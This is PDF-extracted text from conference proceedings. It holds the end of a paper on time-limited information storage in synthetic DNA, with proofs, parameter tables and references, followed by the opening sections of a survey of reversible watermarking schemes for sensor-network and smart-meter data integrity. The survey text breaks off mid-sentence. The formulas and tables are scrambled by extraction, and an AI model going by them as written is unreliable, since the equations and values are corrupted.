As seen in the last section, when n and k are significant, we have a lower agony ratio as well. Search Algorithm: Our search for finding the optimal solutions consists of finding the optimal k for each n, which we call kn . The pair (n, kn ) ensures: ttarget E(n, kn , ta ). We can use the monotonicity properties of E(n, kn , ta ) to proceed efficiently as follows: – Initialisation: Start with n = 1 and k = a and compute E(n, k, ta ). For fixed n, E(ta ) is decreasing with k, and for fixed k, E(ta ) is increasing with n. Hence if E(ta ) < ttarget , increase n until E(ta ) > ttarget . – Increasing k: We can now increase k until we find E(n, k, ta ) ttarget and we can take kn = k. Since the expectation value is monotonically decreasing with k this is easily determined and can be accelerated via the bisection method. For an integer Δ, consider the interval IΔ = [k, k + Δ] and compute c = g(n, k) · g(n, k + Δ), where g(n, k) = E(n, k, ta ) − ttarget . If c < 0, kn+1 ∈ IΔ . In this case bisect IΔ and repeat the same operation. If not, kn > k + Δ and we can choose a new interval from k + Δ.
690
F.-E. El Orche et al.
– Increasing n: Bearing in mind that ttarget E(n, kn , ta ) ≤ E(n + 1, kn , ta ), kn+1 is either kn or bigger. Hence, in the next iteration for n, we initialise k to kn and proceed using last step. – Finally, the optimal n, kn value is chosen to minimise the variance of E(n, k, ta ). Remark 1. We can get a wide range of values of λ if we can adjust the chemical parameters such as temperature, PH and the concentration of particular ions. Since the E(n, k, ta ) and its standard deviation are inversely proportional to λ this can help us to find even better solutions. Note that we got all of our numerical values using a Python simulation since it is faster than working with the theoretical formula of E(ta ) directly. Table 8 in Appendix B illustrates our findings of optimal k of n for ttarget = 2000 min.
6
Conclusion and Future Work
This paper presented a new method for encoding and storing information using synthetic DNA and RNA. We showed that our method allows having information with a foreseeable lifespan. Moreover, we analyzed its security, discussed parameter choice and efficiency. We proposed three different algorithms on how to tune the information lifetime. Other media supports such as bisphenol A thermal fax paper or unstable nonvolatile memory technologies can be used to implement the same principle but the decay models of each of those phenomena should be re-computed and the formulae given in this paper adapted. For instance, in the case of thermal paper, for instance, the number of copies can be replaced by pixel size. Future Work: Being aware of the fact that having very long oligonucleotides is a synthetic challenge and that it can yield to different rates of hydrolysis compared to small-length oligonucleotides due to the formation of intra- and inter-molecular interactions, our theoretical analysis works as a proof of principle and the answer to these research questions is left for a future work.
A
Proofs
Proof of Eq. (2). For time t, the probability that the information is still accessible at this moment is given by P(Tmin > t) and we have: P(Tmin > t) = P(∀j ≤ k k k, Tj > t) = j=1 P(Tj > t) = P(T1 > t)k = (1 − (1 − exp(−λt))n ) , and this is true by definitions of Ti and Li,j , and by independence and uniform distribution of {Ti }i≤k and {Li,j }i≤n,j≤k . Proof of Eq. (3). For time t, the probability that the information is completely destroyed after this time is given by: P(Tmax < t) where: Tmax = (a) and a is T n the security parameter. We introduce the random variable Z = i=1 1(Ti ≤ t)
Taphonomical Security
691
n
and we define p(t) = P(Ti ≤ t) = (1 − exp(−λt)) . We have then: P(T ≤i t) = a−1 kmax P(#{i | Ti ≤ t} ≥ a) = P(Z ≥ a) and thus 1 − P(Tmax ≤ t) = i=0 i p(t) (1 − p(t))k−i Proof of Lemma 1. The number of cuts as a function of the time is a random process, which we will denote by C(t). We can get the expected number of k k n cuts at time t as follows: E[C(t)] = i=1 E[1Ti ≤t ] = i=1 j=1 P(Li,j ≤ t) = k × P(L1,1 ≤ t)n = k × (1 − exp(−λt))n which is true using independence and uniform distribution of random variables {Li,j }j≤n,i≤k . Proof of Lemma 2. This proof is done by calculating three different elements: the cumulative distribution function, the density function and the expected value of tx : – Cumulative distribution function of tx : Ftx (t) = P(∃i1 , . . . , ix ∈ [1, k] : Ti1 , . . . , Tix ≤ t) k k P(T1 ≤ t, . . . , Tm ≤ t, Tm+1 > t, . . . Tk > t) = m=x m =
k k m k−m P(T1 ≤ t) · (1 − P(T1 ≤ t)) m=x m
k k −λt m·n −λt n k−m (1 − e ) · (1 − (1 − e ) ) m ⎛ ⎛ ⎞ ⎛ ⎞⎞ k−m k m·n n·a m · n k − m n · a k p −λpt ⎠ ⎝ a b −λbt ⎠⎠ ·⎝ (−1) e (−1) · ⎝ (−1) e = · p a b m=x m p=0 a=0 b=0
=
m=x
=
k m·n k−m n·a k m · nk − mn · a p+a+b −λ(p+b)t (−1) e p a b m=x p=0 a=0 b=0 m
=
k m·n k−m n·a+p k m · nk − m n · a s+a −λst (−1) e m p a s−p m=x p=0 a=0 s=p
=
kn
˜x (k, n, s)e−λst C
s=0
This result follows from the independence of Ti , for i ∈ [1, k], and using the Newton binomial formula three times. Here: m·n k−m k n·a+p k m · nk − m n · a C˜x (k, n, s) = (−1)b+a δb,s m p a b − p m=x p=0 a=0 p =p
s k−m mn k − m na a k (−1) m p a s−p m=x p=0 a=0
k s+1
(−1) = s
where δs,b is the Kroenecker delta function. kn −λst ˜ = – Density function of tx : ftx (t) = Ftx (t) = s=0 −λsCx (k, n, s)e kn −λst ˜ where we start from s = 1 since the constant term s=1 −λsCx (k, n, s)e vanishes after differentiation. +∞ kn ˜ – Expected value of tx : E(tx ) = 0 tftx (t)dt = s=1 −λsCx (k, n, s) +∞ −λst 1 +∞ kn te dt = λ1 s=1 Cx (k, n, s) where: 0 te−λst dt = and 0 λ2 s2
692
F.-E. El Orche et al.
−C˜x (k, n, s) . This result follows from the fact that we have Cx (k, n, s) = s finite sums. +∞ 2 – Variance of tx : V (tx ) = E(t2x ) − E(tx )2 = t f (tx )dt − 0 2 2 kn −2 ˜ 1 nk +∞ tf (tx )dt = Cx (k, n, s) = s=1 2 2 Cx (k, n, s) − 0 λ s λ s=1 2 kn kn Cx (k, n, s) 1 − 2 s=1 . s=1 Cx (k, n, s) 2 λ s
B
Numerical Values
Table 3. Number of security bits versus number of cuts and DNA fragments. Note that the number of DNA Fragments needed is always the number of cuts plus one Security bits a = log2 (k + 1)! Number of cuts a = 84
24
a = 103
28
a = 133
34
a = 260
57
Table 4. Values of the constants in Eq. (1) constant
apH
bpH
aK
bK
cK
value
0.983
6
0.24
3.16
3.57
unit
none
none
L.mol−1
constant
dK
cMg
value
−0.419
unit
none
mol.L−1
dMg
69.3
aT
0.80 −dMg
(mol.L−1 )
(mol.L−1 )−dk bT
0.07 ◦
none
23
C−1
◦
C
Table 5. f (n, k) values for different values of n and k. Left α = 1 and Right α = 2 n\k
120
160
200
240
280
n\k
120
160
200
240
280
120
1.50
1.46
1.44
1.42
1.41
120
1.67
1.62
1.58
1.56
1.54
160
1.46
1.42
1.40
1.38
1.37
160
1.60
1.56
1.53
1.50
1.49
200
1.43
1.40
1.37
1.36
1.34
200
1.56
1.52
1.49
1.47
1.45
240
1.41
1.38
1.35
1.34
1.33
240
1.53
1.49
1.46
1.44
1.43
280
1.40
1.37
1.34
1.33
1.31
280
1.52
1.48
1.44
1.43
1.41
Taphonomical Security
693
Table 6. (p1 , p2 ) probabilities. Top α = 1 and bottom α = 2. Here λ = 0.001 n\k
120
160
200
240
280
120
(0.84, 0.84)
(0.84, 0.84)
(0.84, 0.82)
(0.83, 0.82)
(0.84, 0.84)
160
(0.83, 0.83)
(0.82, 0.83)
(0.82, 0.84)
(0.84, 0.84)
(0.85, 0.86)
200
(0.84, 0.84)
(0.85, 0.86)
(0.85, 0.84)
(0.82, 0.84)
(0.83, 0.82)
240
(0.85, 0.86)
(0.84, 0.83)
(0.85, 0.82)
(0.83, 0.84)
(0.84, 0.83)
280
(0.84, 0.83)
(0.83, 0.84)
(0.84, 0.84)
(0.84, 0.83)
(0.84, 0.84)
n\k
120
160
200
240
280
120
(0.97, 0.97)
(0.97, 0.97)
(0.96, 0.97)
(0.96, 0.97)
(0.96, 0.97)
160
(0.96, 0.97)
(0.96, 0.97)
(0.96, 0.97)
(0.96, 0.97)
(0.95, 0.97)
200
(0.96, 0.97)
(0.97, 0.98)
(0.96, 0.97)
(0.95, 0.97)
(0.96, 0.97)
240
(0.97, 0.98)
(0.96, 0.97)
(0.97, 0.97)
(0.96, 0.97)
(0.96, 0.97)
280
(0.96, 0.97)
(0.96, 0.97)
(0.96, 0.97)
(0.96, 0.97)
(0.96, 0.97)
Table 7. Order of magnitude of the time for different values of λ T (◦ C) pH
[K + ] [Mg2+ ] λ0 (mins−1 ) λ(mins−1 ) 1/λ
23
0.1
23 37 4 23
13
12.5 0.03
1.3 · 10−9
0
−9
1.3 · 10
0
−7
10−3
1000 min
4, 5 · 10−4 −5
37 h
0.25
0.005
1.4 · 10
4.06 · 10
17.1 months
10.7 0.25
0.005
1.3 · 10−9
3.3 · 10−6
210.43 days
7
0.005
10−8
1.22 · 10−7 15.5 years
7.4
0.25
Table 8. Optimal k for n verifying E(n, k, ta ) − ttarget 0. λ = 0.001 and a = 24 n
1
2
3
4
5
6
7
8
9
10
Optimal k
27
31
36
42
49
57
65
76
87
101
n
11
12
13
14
15
16
17
18
19
20
Optimal k
118
136
156
182
210
243
280
324
374
435
References 1. Cheung, Y.-W., et al.: Evolution of abiotic cubane chemistries in a nucleic acid aptamer allows selective recognition of a malaria biomarker. Proc. Natl. Acad. Sci. 117(29), 16790–16798 (2020) 2. Flamme, M., McKenzie, L.K., Sarac, I., Hollenstein, M.: Chemical methods for the modification of RNA. Methods 161, 64–82 (2019) 3. Rijmen, V., Daemen, J.: The Design of Rijndael: AES—The Advanced Encryption Standard. Information Security and Cryptography, Springer, Heidelberg (2002). https://doi.org/10.1007/978-3-662-04722-4
694
F.-E. El Orche et al.
4. Karik´ o, K., et al.: Incorporation of pseudouridine into mRNA yields superior nonimmunogenic vector with increased translational capacity and biological stability. Mol. Ther. 16(11), 1833–1840 (2008) 5. Kestemont, D., et al.: XNA ligation using T4 DNA ligase in crowding conditions. Chem. Commun. 54(49), 6408–6411 (2018) 6. Kimoto, M., Hirao, I.: Genetic alphabet expansion technology by creating unnatural base pairs. Chem. Soc. Rev. 49(21), 7602–7626 (2020) 7. Kodr, D., et al.: Carborane-or metallacarborane-linked nucleotides for redox labeling. Orthogonal multipotential coding of all four DNA bases for electrochemical analysis and sequencing. Journal of the American Chemical Society 143, 7124– 7134 (2021) 8. Kumar, P., Caruthers, M.H.: DNA analogues modified at the nonlinking positions of phosphorus. Acc. Chem. Res. 53(10), 2152–2166 (2020) 9. Li, Y., Breaker, R.R.: Kinetics of RNA degradation by specific base catalysis of transesterification involving the 2’-hydroxyl group (1999) 10. McCloskey, C.M., Liao, J.-Y., Bala, S., Chaput, J.C.: Ligase-mediated threose nucleic acid synthesis on DNA templates. ACS Synthetic Biol. 8(2), 282–286 (2019) 11. McKenzie, L.K., El-Khoury, R., Thorpe, J.D., Damha, M.J., Hollenstein, M.: Recent progress in non-native nucleic acid modifications. Chem. Soc. Rev. 50, 5126–5164 (2021) 12. Mikkola, S., L¨ onnberg, T., L¨ onnberg, H.: Phosphodiester models for cleavage of nucleic acids. Beilstein J. Org. Chem. 14(1), 803–837 (2018) 13. Polack, F.P., et al.: Safety and efficacy of the BNT162B2 mRNA Covid-19 vaccine. N. Engl. J. Med. 383(27), 2603–2615 (2020) 14. Renders, M., Miller, E., Hollenstein, M., Perrin, D.: A method for selecting modified DNAzymes without the use of modified DNA as a template in PCR. Chem. Commun. 51(7), 1360–1362 (2015) 15. Wolfenden, R., Snider, M.J.: The depth of chemical time and the power of enzymes as catalysts. Am. Chem. Soc. 34, 938–945 (2001) 16. Sadava, D.E., Hillis, D.M., Heller, H.C.: Life, the science of biology (2009) 17. Verma, S., et al.: Modified oligonucleotides: synthesis and strategy for users. Biochem. 67, 99–134 (1998). 1998 by Annual Reviews 18. Zhou, D.-M., Taira, K.: The hydrolysis of RNA: from theoretical calculations to the hammerhead ribozyme-mediated cleavage of RNA. Chem. Rev. 98(3), 991– 1026 (1998)
Evaluation and Analysis of Reversible Watermarking Techniques in WSN for Secure, Lightweight Design of IoT Applications: A Survey Tanya Koohpayeh Araghi1,2(B) , David Megías1,2 , and Andrea Rosales1 1 Internet Interdisciplinary Institute (IN3), Universitat Oberta de Catalunya, Barcelona, Spain
{tkoohpayeharaghi,dmegias,arosales}@uoc.edu 2 Center for Cybersecurity Research of Catalonia (CYBERCAT), Barcelona, Spain
Abstract. Wireless sensor networks (WSNs) are one of the main elements of information acquisition technologies in the Internet of Things (IoT). They are broadly used in managing instruments such as smart meters and health monitoring. The data is prone to manipulation; thus, a secure method is necessary to ensure data integrity. The objectives of this research are to compare lightweight and secure reversible watermarking schemes for data integrity in WSN; elaborate on the influential factors affecting on the system performance; describe the overhead of each security factor in terms of time, memory and energy consumption regarding the computational complexity and, finally, assess the robustness of each scheme to resist against attacks. Taking advantage of the results of this research, we expect that it would be inspiring for researchers to design secure IoT applications such as smart meters by extending these elaborated measurements. We also propose several tips for designing lightweight and secure data integrity methods in IoT. Keywords: Wireless Sensor Networks · IoT security · Reversible watermarking · Authentication · Threat countermeasure · Data integrity
1 Introduction Wireless Sensor Networks (WSNs) are a set of autonomous devices to control physical or environmental features like temperature, pressure, sound, humidity, or pollution by constantly sensing data [1]. Contrasting conventional networks, WSNs are mostly set up in unattended locations, and collected data are sent to the remote user through a gateway using wireless channels [2]. With the advancements in electrical technology, a new approach for the next generation of WSNs has thrived. It includes many low-cost, low-power sensor nodes communicating wirelessly [3]. On a superior scale, the Internet of Things (IoT) network is formed with many sensors and tools joining the Internet for communication and data gathering. Flexibility, scalability and convenience used in smart homes, smart cities and industries have made IoT services popular in recent years [4]. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 695–708, 2023. https://doi.org/10.1007/978-3-031-28073-3_47
696
T. K. Araghi et al.
Due to the restricted energy power, lack of resource reliability, unattended environment implementations, and data transferring risks in unprotected wireless channels, wireless sensors are threatened by potential menaces, including passive eavesdropping attacks or active attacks like data interception or tampering, leading to substantial problems like privacy disclosure [5]. Hence, network security is regarded as a key element for developing WSNs and IoT applications. An example of privacy infringement can occur in smart homes where personal information and user behavior can be analyzed and achieved precisely [6]. Some applications depend on the accuracy of the transmitted data to work properly; for instance, smart meters in smart homes and medical services. As a result, necessary integrity controls must be accomplished to promise that data will not be changed under any circumstances [7]. Ensuring the reliability and integrity of sensory data is a necessary security requirement in WSNs. However, due to the limited computing capacity, storage space and power, traditional cryptographic algorithms used to ensure data integrity are often costly for sensor nodes. In addition, due to the lack of battery resources, depth security is impossible on WSNs. These limitations gave rise to the possibility of exploiting a digital watermark. Digital Watermarking is an effective solution to ensure security, integrity, data authenticity, and robustness in WSN [8]. Its clear benefit is the minor cost of algorithm computation and communication. Watermarking algorithms are significantly lighter than cryptographic techniques and do not require additional communication costs. A common feature of these schemes is a few irreversible changes in the watermarked data. Although in multimedia applications, these changes do not affect the visual (or auditory) perception and expression of image information, it is unacceptable in some critical applications that require highly accurate data, such as military or healthcare. Hence, a reversible watermark is recommended for this purpose [9]. The concept of digital watermarking and reversible watermarking is explained in Sect. 3. Even though there are many watermarking schemes, especially in the field of multimedia, our focus in this paper is just on reversible watermarking techniques for WSNs. The rest of the paper is organized as follows: Sect. 2 presents a comparison between a WSN and one of the IoT applications (smart meters). We discuss how the security mechanisms used in WSNs can be extended to similar IoT applications. Section 3 is devoted to the concept of digital watermarking and reversible watermarking. The literature review and related works are detailed in Sect. 4. Section 5 provides a comparison and discussion between the mentioned related works. Section 6 presents some tips stemming from the results of our investigation for designing and developing security issues in IoT applications. Finally, in Sect. 7, conclusion and future work are outlined.
2 WSN and IoT Smart Meters in Summary Regardless of different protocols for setting the network infrastructure and routing data in WSN and IoT applications, security methods for collecting and transmitting data from source sensors to the destination generally follow identical standards. Due to the
Evaluation and Analysis of Reversible Watermarking Techniques
697
approximately same structure of transmitting data in IoT applications like smart meters and common WSNs, security considerations and policies in WSNs can be extendable for IoT applications. Figure 1(a) shows data transactions in a typical WSN network under LEACH protocol. In LEACH, the sensor nodes are organized in the cluster-based WSN, by a-two tier network architecture. Each sensor node will be grouped in different partitions with a cluster. There is a special node in each cluster named cluster head. Each cluster head collects and aggregates data and then relays them to be sent to the sink node. Compared to sensor nodes, they have abundant computational operations [10].
(a)
(b)
Fig. 1. Data Transfer in: (a).WSN under LEACH protocol, (b) Smart meter
698
T. K. Araghi et al.
Likewise, a smart metering system (see Fig. 1b) consists of the following components: 1. Smart meters: are programmable services that produce data and are connected to the smart home 2. Data aggregator: a service provider that collects, stores, and transmits energy consumption from the SMs. 3. Control centre: manage daily operations of the distributed network by a central distribution system responsible for verifying the authenticity and integrity of the aggregated data [11]. It can be noticed that the information collected from the environment by the sensor nodes is sent to the cluster head (See Fig. 1a). The cluster head will check data authenticity; if data is corrupted or its authenticity is not confirmed, it will be dropped by the cluster head. Otherwise, it will be sent to the sink node. The same technique is executed for the smart meters. Figure 1(b) shows a smart metering system in which the information is collected by the smart meters and then sent to the aggregator. Similar to the cluster heads, the aggregator will check data integrity. In case of not confirming data authenticity, it will be dropped; otherwise, it will be sent to the control centre. Similar security mechanisms for data integrity in WSNs can apply to smart metering systems due to the capabilities, duties and types of the senders, receivers and intermediate nodes.
3 Digital Watermarking and Reversible Watermarking Digital watermarking is fundamentally defined as hiding secret signals, known as watermarks, in the original data, in order to benefit from copyright protection or authentication confirmation [12]. Additionally, the bits carrying the watermark should be spread throughout the host data such that identification of them would be impossible. The embedding technique must maintain the original information logically intact, while a corresponding algorithm can extract the watermark signal [13]. Digital watermarking technology has been used vastly in multimedia security, but its usage is also getting pervasive in WSNs. Since the data values carried by sensors are relatively close to each other, the same techniques of multimedia data are applicable [14]. Moreover, digital watermarking techniques do not impose additional cost and communication overhead, while they are much lighter than cryptographic algorithms. Thus, they are suitable for sensors with constrained resources. Reversible digital watermarking or lossless watermarking is defined as techniques which can authenticate the protected data while accurately restoring the original sensing data. This technology has become a relatively new direction in the field of information security, capable of recovering the data entirely with no further cost [9]. Traditional non-reversible digital watermarking cannot restore the embedded data entirely when the sensed data has been attacked. Using this technique causes minor changes in data, but this modification is irreversible. For those applications such as military, medical treatment, and smart meters, non-reversible watermarks are not acceptable
Evaluation and Analysis of Reversible Watermarking Techniques
699
because of the lack of accuracy [15]. Hence, reversible digital watermarking is the most appropriate option for WSNs. Lossless or reversible watermarking techniques are suitable for sensitive areas like forensic applications [16]. Although reversible watermarking techniques are more accurate and robust, they use more battery power [10].
4 Literature Review and Related Work One of the most important applications of fragile watermarking is data authentication and integrity checking. Different fragile watermarking techniques are proposed for image tamper detection. However, in this research, we classify those tamper detection watermarking techniques that are reversible and used in WSNs for data integrity. In the following, each technique is described with its strengths and drawbacks: Guo et al. [17] present a scheme based on fragile chaining watermarks to confirm the integrity and detect any data manipulation. Data streams are separated into different size groups according to specific calculations. Calculations are based on hash functions, and data streams called synchronization points. The scheme is designed for streaming data in the application layer but applies to sensor networks considering data as streams. Since each data group is synchronized to the previous group, any data tampering affects two adjacent groups. Moreover, any modification such as insertion, deletion or change in the data value would be recognizable. However, on some occasions, specific tampering may cause the system to calculate a wrong synchronization point; consequently, this uncertainty may persist in several groups or, worst case, in the entire groups of data. Shi and Xiao [18] introduced a prediction-error expansion scheme to authenticate data in WSNs. In this scheme, two successive data groups are joined to make a confirmation group. The generator group is in charge of producing the watermark sequence to embed it in the carrier group later. Afterwards, the digital watermark is computed and embedded in the subsequent data chain. In case of tampering with each data group, it would be detected since the verification process could not be successful. This scheme is designed for plain WSN architecture. However, owing to the dynamic length of the groups and the outsized length diversity among the groups, it is possible that a deficient watermark embedding occurs. Furthermore, to some extent, the data carrier group in the transmission procedure can be altered after embedding the watermark, resulting in false synchronization points. Consequently, it confuses the grouping and tends to a soaring false positive rate. It is due to this fact that the authors did not consider the overflow or underflow stemming from expanding the prediction errors. Another drawback of this scheme is higher battery energy consumption compared to irreversible watermarking schemes [10]. Besides, as most routing paths pass through the sensor nodes close to the sink, these sensor nodes rapidly use up their battery energy, causing the network lifetime of the WSN to be condensed. Inspired by the scheme proposed by Shi and Xiao [18], Liu et al. [19] devised a lightweight integrity authentication scheme for Wireless Body Area Networks (WBAN). The authors implemented the scheme on a Tiny OS-based WBAN test bed to confirm its feasibility and efficacy. Unlike the two previously explained schemes, the researchers in this scheme used fixed-size data grouping to reduce the delay produced by calculating the synchronization points. In order to eliminate the possibility of overflow or underflow,
700
T. K. Araghi et al.
they utilized the histogram shifting technique. Local maps are created to repair the shifted data while generating and embedding watermarks are performed in a chaining procedure for data authentication. This scheme can constantly identify any change, such as insertion or deletion of biometric data, without causing any underflow or overflow throughout the watermarking procedures. In addition, in case of tamper detection, the original data can be totally recovered. The authors claim that the computational complexity in their scheme is considerably less than Shi and Xiao’s scheme [18]. However, the scheme imposes a small overhead stemming from data delimiters per packet in each group. Additionally, the operating cost of time and energy for histogram shifting and local map generation must not be ignored. Moreover, the delays generated by buffering data elements of the current group before embedding the watermark must be considered. These delays depending on the data elements are different, while the longest one is (N-1)/F, where N is the number of data elements in each group, and F is the sampling rate of the pulse sensor [19]. Finally, the existence of buffers to cache current groups’ data elements results in memory consumption in this scheme. Wang Chundong, et al. [6] presented a secure data communication scheme based on compressed sensing (CS) and digital watermarking in the Internet of Things. CS technology has unique specifications for simple coding and complex decoding [20]. Through digital watermarking, the secret data is embedded into the usual data at the sensor node coding end. The results show that this scheme can repair the original data, which assures the invertible claim of a number of precise high, accurate applications. In contrast, since the scheme appended additional information with the embedded watermark, extra memory is required to execute hashing, decrypting the asymmetric cipher, and CS calculation, leading to time overhead. In the research proposed by Ding, et al. [21], a reversible watermarking authentication scheme (RDE) is introduced for WSNs. It is derived from the difference expansion of a generalized integer transform. The watermark is built based on a one-way hash function by the source sensors depending on the adjacent data and is embedded into this data to send it to the sink node. The experiments are performed in a real WSN environment and prove that the scheme can preserve data integrity losslessly with small energy operating cost. In contrast with other lossless algorithms, this scheme can bring back the original data entirely using difference expansion of a generalized integer transform, which makes this scheme a good candidate for applications with high accuracy. At the same time, there is no data transmission overhead owing to the watermarking technique used. However, since each bit of the watermark is embedded in the least significant bits of the respective data entry, the integrity of the path of communication cannot be recognized laterally [22]. Chu-Fu Wang, et al. [10] planned a lightweight Hybrid digital Watermarking Authentication technique (HWA) for data authentication under specific network architecture. In HWA both irreversible and reversible watermarking are used for the intra-cluster and inter-cluster communication respectively.
Evaluation and Analysis of Reversible Watermarking Techniques
701
The simulation outcome shows the HWA, balances the data authentication and preserves the battery usage of the sensors in WSN. It also specifies the scheme’s superiority in network lifetime and the delivery ratio compared with irreversible watermarking methods. However, the scheme imposes both false positives and false negatives in the network. Inspired by Guo’s research [17], Guangyong Gao, et al. [9] proposed a dynamic grouping and double verification algorithm to eliminate the false positive rate and low robustness problems in group authentication of the current reversible watermarking algorithms in WSNs. For this purpose, the authors proposed a reversible watermarking technique called Data integrity Authentication with High Detection Efficiency (DAHDE). Regarding close relation of the neighboring data in WSNs, an original data prediction technique according to the prediction-error expansion rule and a flag check bit is adding to the data as well as the watermark to guarantee the steadiness of grouping for identification of the counterfeited synchronization point precisely, throughout the data transmission. Besides, the embedded watermark can be extracted correctly through the reversible watermarking algorithm. Experimental results confirm that the scheme can evade false positive rates, decrease computational costs, and offer powerful grouping robustness. However, using MD5 as a non-secure hash function can endanger system security and increase the probability of collision rate, leading the whole algorithm to be compromised.
5 Comparison and Discussion In this section, all the reversible watermarking schemes mentioned in related works are investigated based on the influential factors affecting the performance of each scheme. We analyzed the state-of-the-art schemes from different points of view and described the results in Sects. 5.1 to 5.3. The first aspect of this comparison is the purpose of designing the schemes. For example, the security aspects to compare if the schemes are designed and implemented to preserve user privacy, including thrift in energy usage, data authentication and integrity, as well as the ability of the schemes to detect any tamper or information leakage and to prevent them. This discussion is brought in Sect. 5.1. Another aspect of our comparison is a collection of influential factors causing optimum performance for the schemes while offering a high level of security. We also included the time and energy overhead in this comparison. The results are presented in Sect. 5.2 and Table 2. Finally, the robustness and resistance of the schemes against attacks are analyzed in Sect. 5.3 and Fig. 2. 5.1 Design Purpose In Table 1, the target of designing the schemes according to the threats to be countermeasure is represented. As it is shown in this table, the main purpose of the majority of the schemes is to detect and prevent tamper detection and localization, acquire authenticity and restore lost data. Among all the proposed works, only Wang and Ding’s models are to assure user privacy and prevent data leakage. Since all the schemes have implemented a lot of repetitive calculations, such as computing hash functions in each data
702
T. K. Araghi et al.
group and embedding watermark data, a minority of them could present a method to be energy-saving. However, the main distinction of the watermarking security methods is to eliminate transmission overhead. Since all the mentioned methods are designed based on reversible watermarking, the restored data after watermark extraction will remain intact. Table 1. Purpose of Design- a: User privacy, b: Information leakage, c: Tamper detection, d: Data √ restoration, e: Authentication & integrity, f: Energy saving, g: Tamper location. Signs- Yes: , –: Not mentioned Threat scheme
a
b
Guo et al. [17]
–
–
Xi Shi and Di Xiao [18]
– √
– √
– √
– √
Chu-Fu Wang et al. [10]
–
–
Guangyong Gao et al. [9]
–
–
Wang Chundong et al. [6] Liu et al. [19] Qun Ding et al. [21]
c √
d √
e √
√
√
√
– √
– √
– √
√
√
√
√
√
√
√
√
√
f – – – – – √ –
g √ √ – √ √ √ √
5.2 Influential Factors on System Performance We categorized the most important influential factors that must be considered in designing a secure data transfer method in WSN or in IoT applications such as smart meters. These factors are described as follows: Watermark Type: according to the target of data hiding, the type of the watermarks is different. Usually, fragile watermarks are most applicable for authentication purposes. The reason is that in fragile watermarks, every small change in the information causes the digital watermark to be removed; as a result, data tampering will be detected. If a fragile watermark can withstand some alterations like noise effects stemming from the transmission channels, it is called semi-fragile or lossless otherwise, it is lossy. Since all the investigated schemes in Table 2 are aimed at data authentication and tamper detection, fragile watermarks are used on them. It can be seen that the schemes proposed by Ding, Shi and Liu are lossless, while Wang’s designed scheme uses both lossy and lossless in two different phases of data transmission. Time and Energy Overhead: these two parameters have a very close relationship to each other and also to the performance of the whole system. Security procedures offer computational overhead, which imposes additional time and energy consumption. On the other hand, the simplicity to implement security procedures brings more guarantees for attackers to compromise the scheme. Hence, a balance needs to be taken into consideration between implementing security and computational complexity. According to Potlapally et al. [23] arithmetic, logical, and bitwise operations are regarded as lightweight operations, while hash functions, symmetric and asymmetric
Fragile
NA
Watermark type
Time overhead
LSB
XOR (Group Hash (time stamp))
LSB
Group Hash (data + time stamp)
NA
MATLAB
Yes
Yes
Watermark technique
Base of watermark creation
False positive / negative effect
Simulation environment
Feasibility of implementation
Efficient security
Negligible
Watermark embedding type
Yes
Yes
Real WSN environment
Yes
Reversible Difference expansion (RDE)
Ignorable
Compressed sensing (CS)
Energy overhead
Negligible
Lossless fragile
Wang Chundong et al. Qun Ding et al. [21] [6] 2014 2015
Schemes influential factors
Relates to hash type and synchronization point
NA
MATLAB
Yes (FN), increase with the length of group parameter & attacks
Group Hash (data + secret key)
LSB
Difference expansion + Chaining watermark
Yes
Yes
Lossless fragile
Xi Shi, Di Xiao [18] 2013
Yes
Yes
Fragile
Guo et al. [17] 2007
Yes
Yes
Lossless fragile
Liu, et al. [19] 2014
NA
Yes
Fragile
Guangyong Gao et al.[9] 2021
Yes
NA
C++ to build a simulator environment
Yes increase with the increasing attacking rate
XOR (Group Hash (data))
Phase1: Redundant area of data Phase 2: LSB
No due to use MD5
NA
Java
Yes
Chain [Hash (data + secret key) previous group and current group]
LSB
Depends on the synchronization point drop rate
Yes
TinyOS-based WBAN test bed + C programming language
NA
Concatenation ( hash of each data group + local mapping (next group))
LSB
No due to use MD5
NA
MATLAB
Yes (FN), increase with increasing tamper data
Hash (data + group flag)
LSB
Hybrid digital Chaining watermark Histogram shifting and Difference Watermarking + hash function(SHA, chaining watermark expansion + Authentication (HWA) MD5) Chaining watermark
Ignorable
Yes
Both lossy & lossless
Chu-Fu Wang et al. [10] 2018
Table 2. Comparison of the different schemes in terms of influential factors affecting security and efficiency- NA: Not mentioned
Evaluation and Analysis of Reversible Watermarking Techniques 703
704
T. K. Araghi et al.
encryptions notably increase computational overhead. Usually, running 3,000 instructions has an energy consumption equal to spreading one bit of data over 100 m [10]. For the same reason, in Table 2, time and energy spending for Ding’s scheme [21] is ignorable. Also, energy overhead for Wang [10] and Wang [6] is negligible too. Thus, all schemes investigated in Table 2 have some energy and time overhead. Watermark Embedding Type and Technique, Base of Watermark Generation and False Positive/Negative Effect (Rows 4 to 7 of Table 2): These items are illustrated in Table 2 based on the volume of computational load, memory usage and false positive/negative effect that watermark generation; embedding and extraction impose on the system. As mentioned in related works, the base of calculations for generating and embedding the watermark for almost all schemes is to divide data into several groups according to constant or dynamic parameters and get the hash value of each data group, and finally chain the achieved hash values to the previous or next group. In terms of computational load, dynamic grouping causes more overhead on the sensor nodes. The reason is that the size of the group should be controlled each time to avoid overflow or underflow problems. In case of occurring each of them, false positives or false negatives will happen which jeopardize the security of the whole group in the worst case. This problem is somehow addressed in Gao’s prediction scheme [9], while Ding et al., [21], Liu et al., [19] and Wang et al. [6] presented fixed grouping in their methods resulting in less computational overhead. Furthermore, the compress sensing technique in Wang, et al. [6] is also economical because this technique includes less computation load on the sensor side and more in the sink side node. In terms of memory usage, chaining watermarks were utilized in the schemes of Shi and Xiao [18], Guo et al. [17], Liu et al. [19], Gao et al. [9] and Wang et al. [10] need to buffer each group of data that participated in the chain group. Therefore, memory usage is increased according to the size of these groups. However, Shi’s prediction error expansion method that cashes just the current data can alleviate this issue. As it is shown in Table 2, the technique for embedding the watermark in all schemes is LSB. Least Significant Bits (LSB) embedding is one of the most basic techniques in digital watermarking that does not significantly affect on the quality of the transmitted data [24]. Although the capacity of the hidden data is small in this technique, it can be regarded as a suitable way for security in IoT and WSN’s applications. The probability of false positive/negative effects for the schemes that relate synchronization points (group delimiters) to divisibility of the achieved hash values to two to provide an even value is high. Hence, accuracy in these schemes is not trustable. Also, the strength of attacks can affect the calculation of the synchronization points. Amongst the schemes in Table 2, Shi and Xiao [18] and Gao et al. [9] could eliminate false positives. However, false negatives can occur in these schemes closely related to the severity of the attacks. Simulation Environment, Feasibility of Implementation and Efficient Security (Rows 8–11 of Table 2): In Table 2, it is 